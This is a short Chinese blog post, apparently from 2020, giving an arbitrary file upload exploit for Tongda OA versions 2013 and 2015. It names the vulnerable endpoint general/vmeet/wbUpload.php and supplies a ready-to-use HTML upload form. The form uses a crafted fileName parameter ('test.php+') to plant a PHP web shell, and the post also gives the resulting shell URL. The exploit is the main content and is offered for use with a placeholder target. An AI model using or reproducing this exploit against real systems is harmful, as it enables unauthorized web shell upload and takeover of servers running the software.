通达OA 任意文件上传-2013/2015版本

参考

http://wiki.0-sec.org/0day/%E9%80%9A%E8%BE%BEoa/11.html

影响版本

2013版本

2015版本

漏洞文件

general/vmeet/wbUpload.php

exp 修改标记的为目标地址

<form enctype="multipart/form-data" action="http://0-sec.org/general/vmeet/wbUpload.php
?fileName=test.php+" method="post">
<input type="file" name="Filedata" size="50"><br>
<input type="submit" value="Upload">
</form>

上传jpg之后shell地址为

http://0-sec.org/general/vmeet/wbUpload/test.php

posted @ 2020-04-24 15:49 Null1433 阅读(953) 评论(0) 编辑收藏举报

刷新页面返回顶部

通达OA 任意文件上传-2013/2015版本

公告